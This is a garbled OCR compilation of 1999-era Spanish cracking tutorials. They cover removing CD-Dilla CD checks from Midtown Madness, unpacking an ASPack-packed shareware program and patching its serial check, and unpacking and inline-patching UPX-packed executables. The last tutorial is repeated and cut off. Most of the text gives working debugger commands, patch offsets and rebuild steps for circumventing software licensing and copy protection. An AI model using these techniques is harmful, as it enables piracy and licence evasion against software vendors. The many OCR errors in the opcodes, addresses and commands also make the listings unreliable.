
00566C15 PUSH 005968D0O 

00566C1A PUSH 00566724 

00566C1F MOV  EAX,FS:[00000000] 

00566C25 PUSH FAX 

00566C26 MOV  FS:[00000000],ESP 

00566C2D ADD ESP, -5C 

00566C30 PUSH EBX 

00566C31 PUSH ESI 

00566C32 PUSH EDI 

00566C33 MOV  [EBP-18],ESP 

00566C36 CALL  [0058F14C] <-- Este es el call en nuestra sección rdata, 
rastreala con (F8) 


en este call, aterrizamos aquí: 


009A6485  pushad 

00946486 push 00000031 

00946488 push 00000000 ---> 0 significa kernels, será 1 por usuario... 
00946490 call [9A64A6] --> Obtiene la dirección real de la función (9A64A6) 
009A6496 add esp, 8 

009A6499  popad 

A ¡mp [XXXXXXXX] 


rastrea este código y verás el ¡mp [XXXXXXXX] llegar a ser jmp [KERNEL32!GetVersion)]... 
okas, eso es bueno, estas en el buen camino :) 
Estamos cerca de empezar a codificar el call fixer!! 


de cualquier forma, necesitamos saber cuantos Kernels e importaciones de usuarios hay 

en este juego!! 

Okas, hay varias formas para hacer esto, puedes desensamblar el ".icd" con wdasm 

y cuentalos, puedes rastrearlos con SICE también, pero yo uso una herramienta llamada EXESCOPE para ver cuantas importaciones obtuvo... 
de cualquier manera, en mi midtown.icd, obtuve: 


- 127 importaciones de kernel 
- 042 importaciones de usuarios 


Okas, pero necesitamos saber este numero en hexadecimal porque SoftICE solo usa valores 
hex =) 

127 =7Fh 

42 =2Ah 


mi parte favorita viene ahora!! codificar el call fixer. 

primero que todo, no tenemos acceso de escritura (Solo acceso de lectura) a la sección Rdata, 
así que moveremos la sección rdata al lugar de la sección data.. 

Para codificar el call fixer, comienzo a codificar en el lugar del OEP, asi que activa tu 

bpx en él y ejecuta el juego de nuevo, espera hasta que rompa... 

ahora, tenemos que mover la sección rdata en el lugar en memoria de la sección data now. 
Para hacer esto, solo escribe: 


"ma 


m "virtual offset de la sección data+image base" 1 "tamaño de rdata" "virtual offset de data" 
NOTA: Para el virtual offset de data, usa un numero mayor, es mejor... 
5A4000 es nuestro virtual offset normal, yo usé 5B0000 (mayor como dije) 


Así, solo escribe esto: 

m 58F000 1 14C99 5B0000 

Okas, ahora es tiempo de codificar!! 
Estas en la linea: 566C10— PUSH EBP 
codificaremos algo que se vea así: 


00 pushad 

01 push ebx 

02 push O 

04 call [XXXXXXXX] 
DA add esp,8 

OD mov edx, XXXXXX 
12 cmp eax,[edx] 

14 je 20 

16 inc edx 

17 cmp edx, XXXXXX + XXXXX 
1D jne 12 

1F int 03 

20 mov [edx],ecx 

22 popad 

23 inc ebx 

24 cmp ebx, XX 

2A jne 00 

2C int 03 


entonces, vamos: 


Escribe en SoftICE: Un "press enter" 


y codifica: 


566C10 pushad 

566C11 push ebx 

566C12 push 0 

566C14 call [009A64A6] <-- dirección real, la encontramos cuando rastreamos en 
el call 

S566C1A add esp,8 

566C1D mov edx, 5B0000 <-- Dirección donde copiamos nuestra sección .rdata 

566C22 cmp eax,[edx] 

566C24 je 566C40 

566C26 inc edx 

566C27 cmp edx, 5B0000 + 14C99  <-- dirección donde copiamos nuestro .rdata + tamaño 
de rdata 

566C3D ¡ne 566C22 

566C3F int 03 <-- seguro, si no encontrara pareja, rompe aquí. 

566C40 mov [edx],ecx 

566C42 popad 

566C43 inc ebx 

566C44 cmp ebx, 7F <-- número de API a arreglar 

S66C4A ¡ne 566C10 

566C4C int 03 


Ahora fija ebx a O (R ebx 0), fija tu eip a la línea O (linea O = 566C10 aquí, entonces 

R EIP 566C10) escribe "¡3here on” y presiona FS para ejecutarlo, normalmente deberías 

romper en 566C4C... 

Ahora fija tu ebx de nuevo a 0, cambia la línea 02 (56CC12 aquí) a "push 1" y cambia la 

línea 24 a 'cmp ebx, número_de_importación_de_usuario' (2A para nosotros) y fija el eip de nuevo a la línea O (R EIP 566C10). Ejecutalo de nuevo. Normalmente, todo esta bien ahora, debería romper en 566C4C de nuevo... 
Ahora, podemos volcar nuestra sección rdata seguramente: 


pagein 5B0000 14C99 c:Wrdata.bin 


jeje!! ahora tenemos que reconstruir un archivo ejecutable que trabaje. 

probé Procdump para importar secciones, pero esta perra no cambio nada, así que 
manualmente importé mis secciones, te mostraré todo ;) 

Primero, haz una copia del archivo ".icd", para nosotros: Midtown.icd, y renombralo como 
quieras, pero con extensión ".exe”. ej: damnit.exe 


Ahora, enciende hexworkshop, abre "Damnit.exe", y abre la la sección volcada. 
fue: c:Mext.bin... 


es ahora, necesitas el Raw offset de cada sección, las he escrito primero en el tut 
pero las rescribiré aquí, para ayudarte a entender este crap :p 


para la sección ".text" : Raw Offset: 600 Tamaño: 18D78F 
para la sección ".Rdata" : Raw Offset: 1I8DE00 Tamaño: 14C99 
para la sección ".data" : Raw Offset: 1A2C00 Tamaño: 3D8A4 
para la sección ".datal" : Raw Offset: 1E0600 Tamaño: 20 
para la sección ".rsrc" : Raw Offset: 1E0800 Tamaño: CB3 


Okas, obtuviste todo aquí!! queremos hacer la sección ".text" la primera: 


En hexworkshop, presiona alt+f5, ingresa el Raw offset de la sección que quieres pegar 
aquí: 600, y haz click en ok. ahora ve al menú edita, y haz click en "select block" 
ingresa el tamaño de la sección, aquí: 18D78F... 


ahora, ve el otro archivo abierto (text.bin), y presiona 'ctrl+a' para seleccionar todo.. 
ahora, regresa a la ventana del ejecutable principal en hexworkshop, y pega el byte que 
copiaste en el clipboard, haz: 'ctrl+v' o en el menú edit, y paste... 

guarda tu archivo, BIEN!! acabas de actualizar la sección '.text' con nuestra sección 
volcada!! 


Okas, haré otra importación de sección contigo, y tu harás las otras de la misma forma! 
2da sección : Rdata! 


puedes cerrar la ventana 'text.bin', y abrir con hexworkshop el archivo: 'rdata.bin' 

click en la ventana del exe principal, presionar 'alt+f5', ingresar el tamaño del 

Raw Offset de la sección rdata: 18DE0O0. Click en ok, ir al menú edit, luego "select block", ingresar el tamaño de la sección rdata: 14C909... 
ver la ventana de rdata.bin, presionar 'ctrl+a' para seleccionar todos los bytes, y 

regresar a la ventana del ejecutable principal (damnit.exe) en hexworkshop... ahora, solo 

pegalos con 'ctrl+c' p con paste del menú edit.. 


Okas, pienso que entendiste ahora, solo haz lo mismo con todas las secciones, graba tu 
ejecutable.. 

Ahora, puedes descargar FrogICE, porque ya no hay Anti-SICE en nuestro exe reconstruido. 
Remueve el cd de midtown madness, y ejecuta 'damnit.exe' o 'comolollamaste.exe' 

WOW!!, el juego corre, muy rapido, sin la ventana tonta, diciendo que esperemos mientras 
la verificación de cd se lleva a cabo, y voila!! el juego corre muy bien =) 

Pero, para hacer un ejecutable perfecto, tienes que reconstruir el PE del archivo como está 
escrito en el tutorial de Black Check: 


Si tratas de ejecutarlo en otra versión de Win 9x, no correra. 

Solo correria en win98, porque la sección rdata contenia las direcciones de todas las 
funciones de win98 (puede solo ser en win95 si lo crackeaste en win95) 

Las direcciones que pusimos en la Tabla de Importación solo son validos para la versión 
de Windows en que lo crackeamos. Arreglemos esto: 


-Inicia Procdump (muy buen trabajo G-RoM :) 
Ve a Options y selecciona: 


[v]Recompute Object Size 
[v]Optmize PE Structure 


[X] Use actual import infos 
entonces, haz click en el boton OK... 


Ahora, tenemos que reconstruir el archivo, haz click en Rebuild PE, y busca tu archivo 
crackeado (Damnit.exe para mi) 


Procdump nos hace una Tabla de Importación valida y nuestro ejecutable está arreglado 
ahora, y es perfecto!!! 
(espero que sí ;p ) debería correr en todas las versiones win9x de Windows... 


Voila!! este tut está terminado, pero si tienes algun comentario o pregunta, Solo mandame 
un email!! 
Acid26000 hotmail.com o ACID_ BURN Onema.com 


Tambien puedes encontrar todos mis tutoriales aquí: http://acidburn2000.cjb.net/ 


Ahora quiero darle saludos especiales a algunas personas que me ayudaron con cdilla: 


- BIG FAT Gracias para R!SC por la ayuda y respuestas a mis preguntas... 


Este amigo rox!! el ha crackeado el nuevo cdilla, MIEDO :p 


- gracias a noos, también por alguna ayuda :) 
- Killer_3K : 'lo ;) 
- G-RoM, por procdump y algunas chateadas virgas (virgo=nice, cool, excelentes) ;p 


y ahora, mis saludos usuales para todos mis amigos: 


Saludos: 
Saludos de grupos: ID - ECLIPSE - CiA - ODT - EXEC - TiTaNe - PWA - PC - UCF- CORE- +HCU 


También saludos a: (sin orden especifico) 


Cyber Blade, “Inferno”, AB4DS, Klefz, , Volatility, TORNEDO, T4D 
Jeff, [Virus], JaNe , Appbusta , Duelist , tKC, BuLLeT , Lucifer48 , 

MiZ , DnNuke , Bjanes , Skymarshall , afkayas , elmopio , SiIFLyiNG , 
Fire Worx , Crackz , neural_en , WarezPup ,_y , SIONIDE , SKORPIEN 
Lazarus , Eternal_Bliss , Magic Raphoun , DEZM , Bisoux , Carpathia , 
K17,theMc , Xmen , TeeJi , JB007 , Arobas , TOAD ,ytc , Kwai_lo, 
TaMaMBoLo , gizmo , Gota , ExtaBrain , Alpine , WarezPup , Zoltan... 


ejej , apuesto que olvide a algunas personas :-/ , sorry !!! 


copyright (c) ACID BuRN y los Immortal Descendants. 


http://www.immortaldescendants.com/ 


1**Tutorial de craqueo por alpine**// 
pperrayuenaae/] 


11**The Inmortal Descendans**/ 
16.06.1999 
Hola. 


Hoy, nos ocuparemos de un tema, el que la gente demanda, es difícil entender, pero te mostraré que hay siempre un modo de desempaquetar un archivo empaquetado que usa la función de volcado de procdump y el pe-editor. 
Primero tengo que agradecer a MIZ, Hobgoblin y acab, sin la ayuda de ellos yo no escribiría este tutorial.) 


Que vamos 4 hacer: 


Primero "manualmente" desempaquetar nuestro objetivo y luego craquearemos la rutina de protección, entra el número ficticio que quieras. 


Necesitamos: 


softice 
weas 
úprocdump /IConsigue las últimas versiones de : protools.cjb.net (el mejor sitio para buscar herramientas comerciales). 


"Nuestro objetivo: 


auoinsultzip// bup://www Jumpingarmadillo.co.uk/Auolnsuly 


Vamos a empezar desempaquetando: 


Lo primero que te preguntarás, o quizás no, si estás familiarizado con esto: ¿Qué es el empaquetado? Muchos programadores comprimen sus programas con un empacador.como el aspack shrinker petite... para hacerlos más pequeños y añadir algo de seguridad. Porqué tenemos que desempucar? Bien primero explico como 
Es comparable a comprimir en ZIP un archivo La diferencia es que la runa de desempacado está ya incluida en el exe principal, Donde además necesitas pkunzip para descomprimir el exe zipeado...) 

El problema con estos empacadores es que desencripta sus datos programa verdaderojen memoria y entonces el programa verdadero se inicia. Así, serás capaz bp en el bpx's común como hmemcpy, getwindowtext (a)... Pero no serás capaz de parchear una cierta dirección como 00401345 jne.. porque si miras el archivo exe usando un editor Hexadecimal, sólo encontrarás datos comprimidos y empacados. Lo que podrías hacer s, usar un parcheador de procesos que parchea sus datos después de que es localizado en memoria 
La desventaja es que tienes que usar el parchcador de procesos siempre que inicias el programa. Por lo tanto esperaremos antes de que los datos sean escritos la memoria y luego lo volcaremos a un archivo exe. 


empacador trabaja: «coge un progt 


ma .comprimelo, añade una rutina de desempacado. 


Carga tu programafautoinsultexe). 
C000004O. Así cambiaremos las caract 


tu symbol Loader ¡Pero softice no se rompe!¡Porque? Softice solo trabajará correctamente si el archivo exe es un ejecutable y contiene datos y si es de Lectura-Escritura. Así que usa un pe-editor, que vien 
ica de la primera línea (text) en EQO00020. Intenta cargarlo en tu syimbo! loader ¡y guau! se ha roto. Tracea porel programa usando f10 hasta que encuentres algo como esto: 


: lic en section y mira que las sect 


mov eax, /lalgo// <--Eax contiene el punto de entrada sin la base de imagen!! ¡¡Escribelo!! 
add cax. /algo//<--Agrega el imagebase 

úpopad <— Retrasa los registros 

mp cax <--Salta al punto de entrada verdadero del programa (push ebp) 


BTW antes de que alcanzaras este trocito código, traceaste por la rutina de desempacado. Esto es el final dela rutina de desempacado. 
¿Qué vamos a hacer ahora? Cuando alcances el jmp eax, El código entero "del programa verdadero” es descomprimido y es escrito ala memoria 
Que tenemos que hacer, debes congelar el programa en aquel punto y volcar los datos en la memoria 4 un archivo. 

Entonces haz lo siguiente: ¡!! ¡¡Gracias 4 MIZ otra vez1!!, cuando alcanzas jmp eax 


“cip 
japeip 


gofocnid 


¿Qué hemos hecho? Mira un cip: contiene una dirección, y lo cambiamos en us 
“Así después de que has escrito g o has presionado (5, vuelve a procdump. Verás 
y cosa falla 

Si intentas iniciar tu archivo, fallará. ¿Porqué? Ya que usamos el mismo punto de entrada el que el archivo empacado usó. Toma los números que anotaste en mov eax,/algo// e 
“Ahora sale intenta ejecutar tu victima. 

¿iii Funciona! 

Ahora eres capaz de desensamblarlo, que tenemos que hacer, para craquear el esquema de protec 
Pero antes: contestar algo: pienso que no sabes por qué simplemente no usé el procdump con su función para desempaquetar, que sera más fácil. Bien, debo admitir, trabaja usando aspack como desempacador, pero sólo porque esto es una versión de aspack que procdump sabe como desempaquetar. ¿Pero qué harás sí la función desempaquetar del procdump no fu 


modo de quedarnos en la dirección, Por jmp 4 cip, siempre saltamos a la dirección actual. 
ya lista delas tareas actuales. Barra de desplazamiento abajo. hasta que encuentres su programa (autoi 


ult y botón derecho sobre él y seleccionar volcar "dump” (completo). Ahora salvalo como desempaquetado o lo que quieras. Ahora tienes hecho un archivo ejecutable, sin datos empaquetados y 


» la ruina de desempacado. 


ja procdump y abre el pe-editor. ¡Ahora selecciona tu archivo nuevo y mira el punto de entrada! Esto es toda 


20EAS. Entonces sustituye esto por los números los que anotaste. Piensa donde: 12531. 


ciona? Y créeme, pasa muy a menudo, Te mostré la forma, sobre como desempaquetar la clase Yany” del empacador, Entonces resumirélo que tendrás que hacer y sobre lo que deberías echar un ojo: 

-Cambia las características de sección si el Symbol Loader no trabaja. 

Traces hasta que encuentres un popad y un salto al punto de entrada verdadero después. Esto también puede ser una llamada (all) tambi 
» del popad dan al punto de entrada a una dirección (address). Anótao, 

En el sao al programa verdadero, coloca un lazo para congelar el programa. 

Usa procdump para volcarlo a un archivo ejecutable. 

Sustituye el punto de entrada de la rutina del empacador con el punto de entrada que anotast, 


Tengo que admitir, que no expliqué algo: Si desemsamblas tu programa, no encontrarás las funciones de importación. No explicaré eto, porque esto haría el tutorial demasiado largo. Sólo necesitamos escuchar la lista muerta para conseguirlos valores hexadecimal para parchear nuestro programa. 


Dertotar de la rutina de protección de nombre/seric 


Bien inicia tu programa, y conseguirás un messagebox, que reclama, que este programa ha sido forzado... ¿Seguridad suplemen 
Lo encontrarás, apuntarás la compensación de hexadecimal y nop ello dela utilización a su editor hexadecimal. Ahora esto deber 


,ia?? No realmente, abre tu desensamblador y busca la cadena en las cadena-datos-referencias. 
trabajar "fino". 


Bien examina el programa entero (desde luego usas tu archivo desempaquetado...)) unas veces y descubrirás una protección de prueba tiempo, algunas funciones están incapacitadas(inuilizadas) y hay una protección de serie/nombre a registro nuestro programa. Ponga cualquier nombre y serial, yo uso alpine y 1234565 desde luego. Pulsa register u OK (no puedo recordar), Y conseguirás un messagebox diciendote que el nombre y el código no hacen juego. Echa na y lo encontrará, pero esperarás hay una mejor cadena: "autoinsult sucsessfully unlocked”, O algo así. Presiona dos veces el ratón sobre el y te encontrarás en aquí: 
:00404342 B990774500 mov ecx, 00457790, 

:00404347 ESD9150000 call 00405925<--hmmm. 
:0040434C $4CO testal, al 

:0040434E TALA je O04O436A<--jump a chico malo 
¿00404350 600 push 00000000 

:00404352 6440 push 00000040 

¿00404354 6870084500 push 00450B7C<--sucsessfully 
:00404359 ESEFIBO300 call 0D435FAD<-messagebox 
:0040435E SBCB mov ex, ebx. 

:00404360 ES488CO200 call 0042CFAD. 

¿00404365 E9SD000000 ¡mp 004043F7 


Ves el salto condicional a 00404348? En nuestro caso saltamos a 00404363, Que provocó nuestro código/nombre no concuerden en messagebox. 
Si nosotros pudiéramos cambiar este je a dos nops, nosotros seríamos capaces de registrar nuestro programa. Lo sé, puedes facilmente nop, pero todavía dice no inscrito. Entonces tenemos que cambiar los datos que son almacenados en total Trabajos Aquí al como una bandera. Tanto si queremos cambiamos, que tenemos tracear en la amada en 00404347. Una vez en él, tracea antes de que se pongas al punto siguiente: 


¿00405964 ES57480000 call OD4DAICO 
:00405969 83FS01 “emp eax, 00000001 

:0040596C 7528 ¿ne 00405996 

:0040596E 3945EC “emp dwword ptr [ebp-14], eax 
¿00405971 7523 ¿ne 00405996 <a 
¿00405973 FF750C push [ebp40C] 

:00405976 ED4EIC lez ecx, dword par [esi+1C] 
¿00405979 ES395B0200 call 00428487 

:0040597E FF7508 push [ebp+08] 

¿00405981 8D4EIS les ecx. dword par [esi+18] 
¿00405984 ES2E5B0200 call 00428487 

:00405989 $B06 mov ea, dword presi] 

:0040598B $BCE mov ecx,esi 

:0040598D C6461001 mov [esiHlOJ OL 2 
¿00405991 FFSOOC call [eax+0C] 

:00405994 EBO4 jmnp DO4OS99A 

¿00405996 80661000 “nd byte pur [esis10], 00. 
:0040599A SASELO mov bl, byte ptr [esis10] <=3 
:0040599D S3ADFCFF or dword ptr [ebp-04], FFFFFFFF 
¿0040591 8D4DFO lea eex, dword ptr [ebp-101 
¿00405944 ES85590200 call 0042832E 

:004059A9 SB4DF4. mov ecx, dword ptr [ebp-0C] 
:0O40S9AC SF pop edi 

:004059AD BAC mov al, bl 14. 

:004059AF SE pop si 

¿00405980 5B pop ebx 

:004059B 1 6489000000000 — mov dword ptr £s-[00000000),ecx. 
:004059B8 09 Leave 

¿00405989 C20800 re0008 

¿Así qué pasa aquí? 


Cuando alcunzas::00405971 jue DOJOS996, el programa quier saltar. 
Mira abajo, que pasa sil programa salt: 
:00405996 y bye ptr [esis10], 0 
00 está añadido a esi+10:y entonces. 
:0040599A mov Bl, byte ptr [esir10] 
el dato almacenado en esis10 es movido a bl.. y Finalmente: 
:O04059AD mov al, bl 


los datos se mueven a al; y sabemos que después de rt, nuestro al es comparado asi mismo,¡Así al contiene 00 como el primer byte y esto es malo! 
Mira el salto condicional a 00405971. Si parchieamos el programa de esa forma, nunca saltará a esa dirección, ocurre lo siguiente: 


01 es movido a esis10 ala dirección 0O4O598D...y así hasta el final 
al contiene 02 como el primer byte. ¡Bueno! Si solo parchea en memoria usando el softce por ejemplo escribiendo 'r MI en la dirección 00405971, el programa será solo registrado por esta vez, Desde el programa comprueba si está registrado usando la rutina al principio también, 
Espero que hayas aprendido un poco. 


¡Eso es todo! 
alpine 
Alpine gmx.al o en wwwimmortaldescendants.com 


Gracias especiales a Miz.Hobgoblin.acab y por supuesto a el immortal descendants. 


y los Immortal Descendants presentan 
Un tutorial sobre UPX unpacker 


Versión Corregida 


prehistoria: 

Acid Burn me envió un archivo, un archivo empacado con UPX. No puedo 
recordar la versión ahora. Fue muy interesante y al inicio no fui capaz de 
desempacarlo (aunque no es difícil como lo vi después), lo admito. Bien, 
algunos días después que localicé la nueva versión de UPX 0.82. Descargué 
el archivo y estudie los docs. Encontré que es una versión beta y podría tener 
algunos bugs. Tengo que admitir que no encontré ningún desmán del 
programa. Para entender mejor el programa, codifiqué mi propio programa 
de prueba, el cual consistió solo de un MessageBox (explicado después). 
Entonces ejecuté upx en él y comencé a debugearlo. Y en este punto 
comienza el tut (aunque incluyo el código fuente del programa de prueba 
aquí. jeje). 


tutorial: 
La primer pregunta es que necesito para seguir este tut. La respuesta es: 
necesitarás: 


1. UPX ver. 0.82 obtenlo de protools.cjb.net 
2. Hview 


3. Softice por supuesto 
4. procdump o cualquier tipo de dumper (volcador o descargador) 


5. Tasm 5.0 o MASM (aunque usaré Tasm) 
6. un poco de conocimiento en asm 
Primera aproximación/ el 
objetivo es conseguir un archivo 
descargado, desempacado 


Primero vamos a crear nuestro pequeño programa de prueba 
Este fue el código fuente que usé: 


.386P 
jumps 
locals 


Model Flat, Stdcall 


extrn ExitProcess :proc 
extrn MessageBoxA :proc 


Data 

_Ccap db "upx-killer",0 
_text1 db "regged!",0 
_text2 db "unregistered!",0 
_flag dd ? 


.Code 
Start: 


mov [_flag],00 

mov eax,[ flag] 
cmp eax, 00000000 
jnz _reg 


push 0 


push offset cap 
push offset _text2 
push 0 

call MessageBoxA 
jmp _exit 


_reg: 
push 0 

push offset cap 
push offset _text1 
push 0 

call MessageBoxA 


_ exit: 
Call ExitProcess 


End Start 


Guarda el archivo (usé upx1.asm) y lo compile con ayuda de un archivo batch 


tasm32 /mx /m3 /z /q upx1l 
tlink32 -x /Tpe /aa /c upxl,upxl,, 
import32.1ib 

del *.obj 

del *.map 


Deberías tener un archivo PE corriendo. Usa procdump para cambiar las 
características de sección a E0000060 (aplícalo a las 3 secciones UPXO, 
UPX1 y UPX2, para estar seguro). Lo cual significa que el archivo es 
ejecutable y contiene código y datos. Si no haces esto, el symbol loader no 


romperá. Ahora usa el symbol loader u rastrea a través del archivo. Verás 
que es muy pequeño. Ahora es tiempo de ejecutar upx sobre él, así para 
empacarlo todo. Usa estos parámetros: upx.exe -7 upx1.exe. Upx empacará 
tu archivo como un virus (jeje alguna clase). Carga tu archivo en el symbol 
loader y una vez Fl0 y versa el siguiente código: 


Lo que vemos aquí, es: 

pushad empuja todos los registros en la pila. Después uno mueve 00405000 
(el cual es el entrypoint -80h) en esi. Así que tipo de código es este entre 
00405000 y 004050807 Lo busqué en el hexeditor y encontré que contiene la 
Tabla de Importación, las cadenas que usé en mi programa (upx1). Así que 
no hay necesidad de eso aún. 000405000+FFFFCO00= 00401000, y esa es la 
dword que es movida a edi. Si has investigado tu propio programa (como te 
dije antes), verías que este es el OEP de tu archivo. (Seguro que puede ser 
diferente debido a las imagebases preferidas ;)). Y también es la localidad de 
memoria donde la rutina desempacadota comienza escribiendo nuestro 
código empacado (desempaquetado). El salto solo salta algunos nop y entra a 
la rutina desempaquetadora. Lo siguiente que hago a menudo es ver la rutina 
desempaquetadora, como desempaca mi código. (No sé por qué, así que no 
me culpen :)). bpm 00401000 w es el breakpoint correcto. Después de 
presionar F5 entrarás en un loop (un sub loop de hecho), el loop 
desempacador (jej). Con un dato activado puedes seguir como es 
desempacado el código y escribir en la localidad en memoria mientras 
presionas F10. Como dije, estás en un sub loop. Te tomará un poco salir de 
todos estos loops (ca. 7 min). Así que te digo la siguiente instrucción 
importante, es: 004051B4.lea eax,[esireax+00005000] carga la Tabal de 
Importación en eax. Ahora estamos un minuto lejos de entrar en nuestro 
programa desempacado. Así que se cuidadoso. Camina con F10 hasta que 
alcances 0040521D. Ves que es? 

jmp 00401000. (S1 tu código es diferente al mío, entonces carga el exe con el 
symbol loader y busca ¡mp 00401000, debería estar cerca de 0040521D) 
Virgo, o no? 

Ahora queremos entrar en un loop infinito para volcar el programa, entonces 


escribe 'a eip' y luego '¡mp eip' y otra vez presiona enter. Okas, ahora sal de 
SICE (F5,g o de alguna forma). Abre procdump, en el canal de tareas 
encontrarás upx1.exe. Dale un clic derecho y selecciona dump(full). Ahora 
abre tu nuevo archivo volcado con pe-editor y cambia el Punto de entrada a 
00001000. arreglado y listo para correr. Pruébalo! 

Ahora puedes aplicarle tu parche. No debería ser difícil. Si no puedes 
resolverlo, no puedo imaginar que entiendas lo que expliqué hasta ahora ;) 


Segunda aproximación/ el objetivo es insertar nuestro 
código en el archivo empacado (redireccionamiento de código) 


Pienso que sería mejor explicar la teoría primero. Tengo que decir que esta 
parte del tut no es para principiantes! 

Así que, que es redireccinamiento de código? 

Para mi y muchos mas en la escena, redireccionamiento de código significa 
inserta nuestro propio código “dentro” de la rutina desempaquetadora, para 
que el programa ejecute por si mismo nuestro código insertado, lo que 
parchea el exe. Tengo que admitir que he hecho esto un poco mas 
complicado. Encontré que después en... 

lo que necesitamos primero es algo de espacio, el cual será usado para 
insertar nuestro código. Así que abre el archivo y busca 00 00 00 00....un 
montón de ellos. Para me, un buen lugar fue 00405230. Lleno de 00's. 
Ahora tenemos el espacio, ahora debemos redireccionar algo de código de la 
rutina desempacadota para que salte a nuestro código insertado (será 
insertado en 00405230 por supuesto). 

Explicación: queremos que la rutina desempaquetadora desempaque el 
archivo primero, y luego saltar a nuestro código y parchar el archivo en 
memoria. F+Tuve un error, el cual hizo todo un poco mas complicado. Pero 
pensé por qué no hacer algo mas complicado, algo que atormente el cerebro 
:). El error pasó mientras usaba hview y veía el Punto de Entrada Real del 
programa en 0040521d. Hview no mostró ¡mp 00401000 (El punto de 
Entrada Real) pero algo más. Por lo tanto, pensé que la rutina desempacadota 


calcula el Punto de Entrada Real y sobreescribe 0040521d. (espero que 
puedas seguirme). Por lo tanto, no tendría sentido cambiar 0040521d ¡mp 
004ffbc0 (que es lo que hview me mostró) en ¡mp 00405230, porque se 
borraría de todas formas. Por lo tanto busqué un salto para arreglarlo, lo 
encontré realmente en el principio: 


:004050A0 60 pushad 
:004050A1 BE00504000 mov esi, 
00405000 

:004050A6 SDBEOOCOFFFF lea edi, 
dword ptr [esi+FFFFCO00] 

:004050AC 57 push edi 
:004050AD 83CDFF or ebp, 
FFFFFFFF 

:004050B0 EB10 jmp 


004050C2 -->here 


Recuerdas ese salto, o no? Encontré ese salto también en hview, y por lo 
tanto, lo cambió a ¡mp 00405230. algunos podrán gritar ahora porque esto 
podría cambiar el siguiente código, pero upx tiene una característica virga: 
después de ese salto, hay un grupo de nops. Eso hace fácil cambiarlos. Los 
opcodes para jmp 00405230 son : EOBFB1BFFF Aplica estos cambios con 
la ayuda de hview. Imagínate caminando con SICE (o camina y haz cambios 
temporales) a través del código alcanzando 004050BO0 y saltando también 
00405230. Sí, estas en lo correcto, no hay nada allí (por el momento), solo 
algunos [eax],al lo cual señaliza nuestros 0000's. 

lo siguiente que necesitamos hacer es cambiar este 0040521D ¡mp 00401000 
a jmp 00405260. te preguntas por qué? Bien después de desempacarlo, 
quiere saltar al programa real, pero tenemos que ejecutar nuestro parche 
primero, por lo tanto no queremos saltar a 00401000 pero sí a 00405260 
(donde agregaremos nuestro parche). 

Cambiando ese salto a jmp 00405260 se ve así: 

jmp 00405260 en opcodes es : EB41 


Pero en 00405260 no soporta algo com EB43 para que podamos 
sobreescribirlo, no algunos bytes mas encontramos allí algo como 
EB43FF32BC por lo que vamos a parcharlo con EB41000000 para 
sobrescribirlo completamente. En asm, esa rutina de sobrescritura en 
00405230 se ve como esto: 


00405230 66C7051D524000EB41 mov word 
ptr[0040521d], 41EB 
00405239 66C7051F5240000000 mov word 
ptr[0040521f], 0000 


00405242 C6052152400000 mov byte 
ptr[00405221], 00 

00405249 E974FEFFFF jmp 
004050C2 


Okas, espero que entiendas las primeras 3 líneas (recuerdas el orden invertido 
de la primera línea), si no, ellos parchan el ¡mp 0040100 a ¡mp 00405260. la 
última línea salta a 00405242. sube un poco a la tabla amarilla. 00405242 es 
el inicio de la rutina desempacadota. 


Resumen de lo que se ha hecho hasta ahora: 
Parchamos un ¡mp de ¡mp 00405242 a ¡mp 00405230 


Insertamos nuestro primer código de rutina, el cual parcha el salto al 
programa real de 00401000 a 00405260 


Imagina el programa corriendo: comienza; salta a nuestra primer rutina; 
parcha el salto; salta de Nuevo a la rutina desempacadota; finalmente alcanza 
el salto en 0040521d salta a 00405260; y ahora”? 

ahora agregamos la segunda rutina, la cual parcha el programa en memoria: 


Esto es muy fácil, porque el programa que codificamos, puede ser pegado 
cambiando un jnz a ]z.(Solo es un demo, lo recuerdas?) 
Alcanzamos 00405260: insertando: 


00405260 C6051210400074 mov byte 
ptr[00401012],74 

00405267 E974FEFFFF ¡mp 
00401000 


La primera línea parcha el jnz en un jz y la segunda línea salta al programa 
real. Ahora tienes un archivo corriendo empacado / desempacado pero este 
es el punto en que tienes un archivo parchado. 


Después, haciéndolo temporal con SICE, toma los opcodes que marqué en 
azul e inserta todo lo que necesite en el archivo, con la ayuda de hview. 
Ahora es estático! 


Saludos y gracias van a: 


Volatility 
Lord Soth 
Lucifer 48 
Tornado 
Acid_Burn 
Risc 
Pain 
yte_ 
LaZaRuS 
RevX 
knotty 
Warezpup 
oeendcidioa and all I forgot :( sorry 


and the Immortal Descendants present 
an UPX unpacker tutorial 


Prologo: 

Acid_Burn me envio un archivo que se empaqueto con UPX , no recuerdo ahora la version correcta,era un tema muy 
interesante y al principio no era capaz de desempacarlo. Algunos dias despues localice una nueva version de UPX 0.82 la 
descargue y estudie los Doc. Encontre que es una beta y podria tener aun algunos bugs , tengo que admitir que no encontre 
ningun comportamiento extraño en el programa. Para entender mejor el programa he codificado mi propio Programa- Test el 
cual consiste solo en un MessageBox (explicado mas abajo).Entonces ejecuto upx sobre el y comienzo a debuggearlo y en este 
punto comienza el tute (Tambien he incluido el fuente,je,je) 


tutorial: 
La primera cuestion es... que necesito para seguir este tute? , la respuesta es la siguiente: 


1. UPX version 0.82 obtenido de protools.cbj.net 
2. Hview 

3. Softlce por supuesto 

4. ProcDump o cualquier otro volcador 


5. Tasm3.0 o MASM 6. Un poco de conocimiento de Asembler 


Primera Aproximacion (Obtrener el archivo volcado/desempacado) 


Primero veamos el codigo de nuestro pequeño programa-test: Este fue el codigo-fuente que use: 


.386P 
jumps 
locals 


Model Flat, Stdcall 


extrn ExitProcess :proc 
extrn MessageBoxA :proc 


.Data 

_Cap db "upx-killer",0 
_text1 db "regged!",0 
_text2 db "unregistered!",0 
_flag dd ? 


.Code 
Start: 


mov [_flag],00 

mov eax,[_flag] 
cmp eax, 00000000 
jnz_reg 


push 0 

push offset _cap 
push offset _text2 
push O 

call MessageBoxA 
jmp _exit 


_reg: 
push O 

push offset _cap 
push offset _text1 
push O 

call MessageBoxA 


_ exit: 
Call ExitProcess 


End Start 


Salva el archivo(yo use upx1.asm) y compilalo con la ayuda de un Batch 


tasm32 /mx /m3 /z /q upx1 

tlink32 -x /Tpe /aa /c upx1,upx1,, import32.lib 
del *.obj 

del *.map 


Ahora deberias tener un ejecutable PE. Usa procdump para cambiar las caracteristicas de la seccion a E0000060 ( aplicalo a las 
tres secciones UPXO,UPX1 y UPX2 para asegurar)Lo que significa que el archivo es un ejecutable y contiene codigo y datos,si 
